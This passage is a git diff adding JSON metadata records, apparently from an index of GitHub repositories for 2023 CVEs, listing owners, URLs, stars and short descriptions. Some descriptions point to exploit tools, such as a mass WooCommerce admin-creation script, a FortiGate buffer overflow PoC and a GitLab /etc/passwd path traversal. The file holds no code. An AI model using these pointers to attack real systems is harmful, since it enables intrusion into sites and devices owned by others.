+ "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27703.json b/2023/CVE-2023-27703.json new file mode 100644 index 0000000000..292818c990 --- /dev/null +++ b/2023/CVE-2023-27703.json @@ -0,0 +1,33 @@ +[ + { + "id": 626273931, + "name": "CVE-2023-27703", + "full_name": "happy0717\/CVE-2023-27703", + "owner": { + "login": "happy0717", + "id": 36958703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36958703?v=4", + "html_url": "https:\/\/github.com\/happy0717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happy0717\/CVE-2023-27703", + "description": "CVE-2023-27703 An Android version of pikpak version V1.29.2 element debugging interface leakage vulnerability", + "fork": false, + "created_at": "2023-04-11T06:24:04Z", + "updated_at": "2024-04-12T08:19:06Z", + "pushed_at": "2023-04-11T06:39:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27704.json b/2023/CVE-2023-27704.json new file mode 100644 index 0000000000..88fd67cd85 --- /dev/null +++ b/2023/CVE-2023-27704.json @@ -0,0 +1,33 @@ +[ + { + "id": 626280876, + "name": "CVE-2023-27704", + "full_name": "happy0717\/CVE-2023-27704", + "owner": { + "login": "happy0717", + "id": 36958703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36958703?v=4", + "html_url": "https:\/\/github.com\/happy0717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happy0717\/CVE-2023-27704", + "description": "CVE-2023-27704 Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS)", + "fork": false, + "created_at": "2023-04-11T06:41:58Z", + "updated_at": "2023-04-11T06:41:58Z", + "pushed_at": "2023-04-11T06:46:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27742.json b/2023/CVE-2023-27742.json new file mode 100644 index 0000000000..e827ce6b3c --- /dev/null +++ b/2023/CVE-2023-27742.json @@ -0,0 +1,33 @@ +[ + { + "id": 634735317, + "name": "CVE-2023-27742", + "full_name": "G37SYS73M\/CVE-2023-27742", + "owner": { + "login": "G37SYS73M", + "id": 77768845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4", + "html_url": "https:\/\/github.com\/G37SYS73M", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2023-27742", + "description": "IDURAR ERP\/CRM v1 was discovered to contain a SQL injection vulnerability via the component \/api\/login.", + "fork": false, + "created_at": "2023-05-01T03:35:53Z", + "updated_at": "2023-05-02T14:37:50Z", + "pushed_at": "2023-05-11T07:40:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27746.json b/2023/CVE-2023-27746.json new file mode 100644 index 0000000000..f4389c83e4 --- /dev/null +++ b/2023/CVE-2023-27746.json @@ -0,0 +1,37 @@ +[ + { + "id": 607771290, + "name": "blackvue-cve-2023", + "full_name": "eyJhb\/blackvue-cve-2023", + "owner": { + "login": "eyJhb", + "id": 25955146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25955146?v=4", + "html_url": "https:\/\/github.com\/eyJhb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eyJhb\/blackvue-cve-2023", + "description": "BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748", + "fork": false, + "created_at": "2023-02-28T16:37:33Z", + "updated_at": "2024-10-11T03:35:18Z", + "pushed_at": "2024-02-02T23:35:18Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-27746", + "cve-2023-27747", + "cve-2023-27748" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27842.json b/2023/CVE-2023-27842.json new file mode 100644 index 0000000000..218a885428 --- /dev/null +++ b/2023/CVE-2023-27842.json @@ -0,0 +1,64 @@ +[ + { + "id": 614934943, + "name": "CVE-2023-27842", + "full_name": "tristao-marinho\/CVE-2023-27842", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-27842", + "description": null, + "fork": false, + "created_at": "2023-03-16T15:59:39Z", + "updated_at": "2023-03-19T00:17:25Z", + "pushed_at": "2023-03-16T16:01:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618977251, + "name": "CVE-2023-27842", + "full_name": "cowsecurity\/CVE-2023-27842", + "owner": { + "login": "cowsecurity", + "id": 74612612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2023-27842", + "description": null, + "fork": false, + "created_at": "2023-03-25T22:25:37Z", + "updated_at": "2023-04-01T15:46:33Z", + "pushed_at": "2023-03-31T21:23:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27997.json b/2023/CVE-2023-27997.json new file mode 100644 index 0000000000..a8343e929e --- /dev/null +++ b/2023/CVE-2023-27997.json @@ -0,0 +1,281 @@ +[ + { + "id": 654396301, + "name": "CVE-2023-27997-POC", + "full_name": "rio128128\/CVE-2023-27997-POC", + "owner": { + "login": "rio128128", + "id": 136775778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136775778?v=4", + "html_url": "https:\/\/github.com\/rio128128", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rio128128\/CVE-2023-27997-POC", + "description": "POC FortiOS SSL-VPN buffer overflow vulnerability", + "fork": false, + "created_at": "2023-06-16T03:25:19Z", + "updated_at": "2024-11-22T11:31:43Z", + "pushed_at": "2023-06-16T03:28:34Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654732896, + "name": "CVE-2023-27997-check", + "full_name": "BishopFox\/CVE-2023-27997-check", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/CVE-2023-27997-check", + "description": "Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on response timing", + "fork": false, + "created_at": "2023-06-16T20:15:36Z", + "updated_at": "2024-10-10T03:00:26Z", + "pushed_at": "2024-05-08T16:17:07Z", + "stargazers_count": 130, + "watchers_count": 130, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 130, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 657194011, + "name": "CVE-2023-27997-Check", + "full_name": "imbas007\/CVE-2023-27997-Check", + "owner": { + "login": "imbas007", + "id": 100182585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100182585?v=4", + "html_url": "https:\/\/github.com\/imbas007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imbas007\/CVE-2023-27997-Check", + "description": null, + "fork": false, + "created_at": "2023-06-22T14:16:44Z", + "updated_at": "2023-07-05T11:29:36Z", + "pushed_at": "2023-06-23T01:39:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 657672773, + "name": "cve-2023-27997", + "full_name": "puckiestyle\/cve-2023-27997", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/cve-2023-27997", + "description": null, + "fork": false, + "created_at": "2023-06-23T15:15:54Z", + "updated_at": "2023-06-23T15:16:12Z", + "pushed_at": "2023-06-23T15:16:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665271629, + "name": "ShodanFortiOS", + "full_name": "TechinsightsPro\/ShodanFortiOS", + "owner": { + "login": "TechinsightsPro", + "id": 116123212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116123212?v=4", + "html_url": "https:\/\/github.com\/TechinsightsPro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TechinsightsPro\/ShodanFortiOS", + "description": "Search vulnerable FortiOS devices via Shodan (CVE-2023-27997)", + "fork": false, + "created_at": "2023-07-11T20:41:03Z", + "updated_at": "2024-10-25T02:04:45Z", + "pushed_at": "2023-07-11T20:41:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686590287, + "name": "CVE-2023-27997", + "full_name": "Cyb3rEnthusiast\/CVE-2023-27997", + "owner": { + "login": "Cyb3rEnthusiast", + "id": 143934696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143934696?v=4", + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast\/CVE-2023-27997", + "description": "How to get access via CVE-2022-27997", + "fork": false, + "created_at": "2023-09-03T10:01:24Z", + "updated_at": "2023-09-10T10:48:40Z", + "pushed_at": "2023-09-09T09:22:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704142501, + "name": "xortigate-cve-2023-27997", + "full_name": "lexfo\/xortigate-cve-2023-27997", + "owner": { + "login": "lexfo", + "id": 23701097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23701097?v=4", + "html_url": "https:\/\/github.com\/lexfo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lexfo\/xortigate-cve-2023-27997", + "description": "xortigate-cve-2023-27997", + "fork": false, + "created_at": "2023-10-12T16:12:41Z", + "updated_at": "2024-10-10T01:56:11Z", + "pushed_at": "2023-10-12T16:17:23Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 62, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 704180144, + "name": "CVE-2023-27997", + "full_name": "delsploit\/CVE-2023-27997", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2023-27997", + "description": null, + "fork": false, + "created_at": "2023-10-12T17:50:38Z", + "updated_at": "2024-03-01T09:02:02Z", + "pushed_at": "2023-10-12T18:13:23Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 888520597, + "name": "CVE-2023-27997-POC", + "full_name": "node011\/CVE-2023-27997-POC", + "owner": { + "login": "node011", + "id": 124257857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124257857?v=4", + "html_url": "https:\/\/github.com\/node011", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/node011\/CVE-2023-27997-POC", + "description": "Fortigate SSL VPN buffer overflow exploit", + "fork": false, + "created_at": "2024-11-14T14:41:20Z", + "updated_at": "2024-11-14T15:08:40Z", + "pushed_at": "2024-11-14T15:08:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28121.json b/2023/CVE-2023-28121.json new file mode 100644 index 0000000000..bffe75488e --- /dev/null +++ b/2023/CVE-2023-28121.json @@ -0,0 +1,204 @@ +[ + { + "id": 621569715, + "name": "CVE-2023-28121", + "full_name": "gbrsh\/CVE-2023-28121", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2023-28121", + "description": "WooCommerce Payments: Unauthorized Admin Access Exploit", + "fork": false, + "created_at": "2023-03-30T23:50:39Z", + "updated_at": "2024-05-15T06:21:35Z", + "pushed_at": "2023-05-31T13:21:43Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665349664, + "name": "Mass-CVE-2023-28121", + "full_name": "im-hanzou\/Mass-CVE-2023-28121", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/Mass-CVE-2023-28121", + "description": "CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ] ", + "fork": false, + "created_at": "2023-07-12T02:41:26Z", + "updated_at": "2024-11-07T18:03:29Z", + "pushed_at": "2023-07-14T21:47:59Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-28121", + "exploit", + "mass", + "python", + "woocommerce", + "woocommerce-payment", + "wordpresss" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665401623, + "name": "Mass-CVE-2023-28121-kdoec", + "full_name": "rio128128\/Mass-CVE-2023-28121-kdoec", + "owner": { + "login": "rio128128", + "id": 136775778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136775778?v=4", + "html_url": "https:\/\/github.com\/rio128128", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rio128128\/Mass-CVE-2023-28121-kdoec", + "description": "CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ]", + "fork": false, + "created_at": "2023-07-12T06:04:56Z", + "updated_at": "2023-07-12T07:15:07Z", + "pushed_at": "2023-07-12T06:23:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 669932793, + "name": "CVE-2023-28121", + "full_name": "C04LA\/CVE-2023-28121", + "owner": { + "login": "C04LA", + "id": 21272230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272230?v=4", + "html_url": "https:\/\/github.com\/C04LA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C04LA\/CVE-2023-28121", + "description": null, + "fork": false, + "created_at": "2023-07-23T22:38:39Z", + "updated_at": "2023-07-23T22:38:39Z", + "pushed_at": "2023-07-23T22:38:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713660150, + "name": "WP-CVE-2023-28121", + "full_name": "Jenderal92\/WP-CVE-2023-28121", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-28121", + "description": "Wordpress CVE-2023-28121", + "fork": false, + "created_at": "2023-11-03T01:19:09Z", + "updated_at": "2024-11-21T14:57:41Z", + "pushed_at": "2024-11-17T23:45:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bot-auto-scanner-vuln", + "bot-auto-upload-shell", + "cve-2023-28121", + "cve-wordpress", + "exploit", + "vulnerability", + "wordpress" + ], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714083360, + "name": "CVE-2023-28121", + "full_name": "1337nemojj\/CVE-2023-28121", + "owner": { + "login": "1337nemojj", + "id": 36542035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36542035?v=4", + "html_url": "https:\/\/github.com\/1337nemojj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337nemojj\/CVE-2023-28121", + "description": null, + "fork": false, + "created_at": "2023-11-03T22:02:11Z", + "updated_at": "2023-11-03T22:07:39Z", + "pushed_at": "2023-11-15T11:47:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28197.json b/2023/CVE-2023-28197.json new file mode 100644 index 0000000000..5fd89a35c9 --- /dev/null +++ b/2023/CVE-2023-28197.json @@ -0,0 +1,33 @@ +[ + { + "id": 730398815, + "name": "inputcontrol", + "full_name": "spotlightishere\/inputcontrol", + "owner": { + "login": "spotlightishere", + "id": 10055256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10055256?v=4", + "html_url": "https:\/\/github.com\/spotlightishere", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spotlightishere\/inputcontrol", + "description": "proof-of-concept for CVE-2023-28197", + "fork": false, + "created_at": "2023-12-11T20:55:21Z", + "updated_at": "2023-12-12T00:36:25Z", + "pushed_at": "2023-12-11T20:56:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28206.json b/2023/CVE-2023-28206.json new file mode 100644 index 0000000000..c2ff04336e --- /dev/null +++ b/2023/CVE-2023-28206.json @@ -0,0 +1,33 @@ +[ + { + "id": 640980356, + "name": "acceleratortroll", + "full_name": "acceleratortroll\/acceleratortroll", + "owner": { + "login": "acceleratortroll", + "id": 133675032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133675032?v=4", + "html_url": "https:\/\/github.com\/acceleratortroll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acceleratortroll\/acceleratortroll", + "description": "Abusing CVE-2023-28206 to make something useful", + "fork": false, + "created_at": "2023-05-15T14:22:12Z", + "updated_at": "2024-07-30T06:56:49Z", + "pushed_at": "2023-05-17T17:39:26Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28218.json b/2023/CVE-2023-28218.json new file mode 100644 index 0000000000..e89633b781 --- /dev/null +++ b/2023/CVE-2023-28218.json @@ -0,0 +1,33 @@ +[ + { + "id": 648327862, + "name": "CVE-2023-28218", + "full_name": "h1bAna\/CVE-2023-28218", + "owner": { + "login": "h1bAna", + "id": 70074237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074237?v=4", + "html_url": "https:\/\/github.com\/h1bAna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1bAna\/CVE-2023-28218", + "description": null, + "fork": false, + "created_at": "2023-06-01T18:04:32Z", + "updated_at": "2024-02-25T18:56:02Z", + "pushed_at": "2023-06-01T18:10:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2822.json b/2023/CVE-2023-2822.json new file mode 100644 index 0000000000..79665d86bb --- /dev/null +++ b/2023/CVE-2023-2822.json @@ -0,0 +1,33 @@ +[ + { + "id": 643696394, + "name": "CVE-2023-2822-demo", + "full_name": "cberman\/CVE-2023-2822-demo", + "owner": { + "login": "cberman", + "id": 832957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/832957?v=4", + "html_url": "https:\/\/github.com\/cberman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cberman\/CVE-2023-2822-demo", + "description": "Simple flask application to implement an intentionally vulnerable web app to demo CVE-2023-2822.", + "fork": false, + "created_at": "2023-05-22T00:46:24Z", + "updated_at": "2023-05-27T20:41:23Z", + "pushed_at": "2023-05-27T20:41:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28229.json b/2023/CVE-2023-28229.json new file mode 100644 index 0000000000..a9fbddebdd --- /dev/null +++ b/2023/CVE-2023-28229.json @@ -0,0 +1,64 @@ +[ + { + "id": 686907418, + "name": "CVE-2023-28229", + "full_name": "Y3A\/CVE-2023-28229", + "owner": { + "login": "Y3A", + "id": 62646606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4", + "html_url": "https:\/\/github.com\/Y3A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y3A\/CVE-2023-28229", + "description": null, + "fork": false, + "created_at": "2023-09-04T07:48:13Z", + "updated_at": "2024-11-15T16:50:23Z", + "pushed_at": "2024-01-08T03:34:51Z", + "stargazers_count": 130, + "watchers_count": 130, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 130, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 778505062, + "name": "CrackKeyIso", + "full_name": "byt3n33dl3\/CrackKeyIso", + "owner": { + "login": "byt3n33dl3", + "id": 151133481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151133481?v=4", + "html_url": "https:\/\/github.com\/byt3n33dl3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byt3n33dl3\/CrackKeyIso", + "description": "it's a CVE-2023-28229 (Patched), but feel free to use it for check any outdated software or reseach", + "fork": false, + "created_at": "2024-03-27T20:57:46Z", + "updated_at": "2024-11-17T16:51:16Z", + "pushed_at": "2024-07-08T16:04:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28231.json b/2023/CVE-2023-28231.json new file mode 100644 index 0000000000..d9dca8c8f1 --- /dev/null +++ b/2023/CVE-2023-28231.json @@ -0,0 +1,33 @@ +[ + { + "id": 636872469, + "name": "CVE-2023-28231", + "full_name": "TheHermione\/CVE-2023-28231", + "owner": { + "login": "TheHermione", + "id": 73027590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73027590?v=4", + "html_url": "https:\/\/github.com\/TheHermione", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheHermione\/CVE-2023-28231", + "description": "DHCP Server Remote Code Execution impact: 2008 R2 SP1 до Server 2019", + "fork": false, + "created_at": "2023-05-05T21:13:13Z", + "updated_at": "2024-07-04T18:05:42Z", + "pushed_at": "2023-05-05T21:15:24Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 69, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28244.json b/2023/CVE-2023-28244.json new file mode 100644 index 0000000000..de6b4e7987 --- /dev/null +++ b/2023/CVE-2023-28244.json @@ -0,0 +1,33 @@ +[ + { + "id": 647848616, + "name": "cve-2023-28244", + "full_name": "sk3w\/cve-2023-28244", + "owner": { + "login": "sk3w", + "id": 1188891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1188891?v=4", + "html_url": "https:\/\/github.com\/sk3w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sk3w\/cve-2023-28244", + "description": null, + "fork": false, + "created_at": "2023-05-31T16:43:34Z", + "updated_at": "2023-09-24T13:57:04Z", + "pushed_at": "2023-05-31T16:50:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2825.json b/2023/CVE-2023-2825.json new file mode 100644 index 0000000000..b54c166534 --- /dev/null +++ b/2023/CVE-2023-2825.json @@ -0,0 +1,191 @@ +[ + { + "id": 645357440, + "name": "CVE-2023-2825", + "full_name": "Occamsec\/CVE-2023-2825", + "owner": { + "login": "Occamsec", + "id": 55592824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55592824?v=4", + "html_url": "https:\/\/github.com\/Occamsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Occamsec\/CVE-2023-2825", + "description": "GitLab CVE-2023-2825 PoC. This PoC leverages a path traversal vulnerability to retrieve the \/etc\/passwd file from a system running GitLab 16.0.0.", + "fork": false, + "created_at": "2023-05-25T13:25:10Z", + "updated_at": "2024-09-14T08:09:37Z", + "pushed_at": "2023-06-02T12:10:06Z", + "stargazers_count": 142, + "watchers_count": 142, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2825", + "gitlab" + ], + "visibility": "public", + "forks": 32, + "watchers": 142, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 646319872, + "name": "CVE-2023-2825", + "full_name": "yuimarudev\/CVE-2023-2825", + "owner": { + "login": "yuimarudev", + "id": 68449029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68449029?v=4", + "html_url": 